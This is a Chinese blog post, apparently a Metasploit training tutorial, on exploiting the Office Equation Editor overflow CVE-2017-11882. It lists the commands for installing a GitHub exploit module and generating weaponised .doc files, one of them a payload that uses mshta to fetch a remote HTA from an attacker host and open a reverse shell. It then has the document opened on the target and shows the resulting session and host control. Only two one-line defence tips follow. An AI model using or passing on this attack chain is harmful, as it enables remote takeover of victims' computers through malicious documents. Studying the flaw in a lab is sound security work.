0
点赞
收藏
分享

微信扫一扫

Metasploit训练基础-漏洞分析CVE-2017-11882

CVE-2017-11882信息

CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。


漏洞影响


office 2003  版本

office 2007  版本

office 2010  版本

office 2013  版本

office 2016  版本


分析过程


目标主机:win10安装了office2016软件。


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析


打开msf


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_02


搜索模块,发现是手动


我们使用github上面的项目文件


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_03


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_04


首先下载解压文件


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_05


将CVE-2017-11882-metasploit文件夹中的文件复制到以下目录


cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local


cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits


将CVE-2017-11882-master放到kali中


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_06


鼠标右键


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_07


选择“在这里打开终端”


python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test01.doc


生成测试文件


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_08


在主机上打开

测试漏洞是否存在


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_09


验证通过


更改反弹shell


打开msf,重新加载模块


msfconsole

reload_all


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_10


搜索模块


search cve-2017-11882


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_11


选择第二个


use exploit/windows/local/cve_2017_11882


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_12


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_13


设置好参数


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_14


exploit执行


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_15


返回到这里,我们生成一个反弹shell


python2 Command43b_CVE-2017-11882.py -c "mshta http://192.168.29.133:8080/pl.hta" -o rshell01.doc


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_16


将文档发送到目标主机


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_17


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_18


双击打开


Metasploit训练基础-漏洞分析CVE-2017-11882_漏洞分析_19


有会话反弹


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_20


进入会话,获取主机控制权


Metasploit训练基础-漏洞分析CVE-2017-11882_安全入门_21


sysinfo


获取当前系统信息。


测试结束


防御措施


1、及时更新office版本

2、不要点击来源不明的文件

举报

相关推荐

0 条评论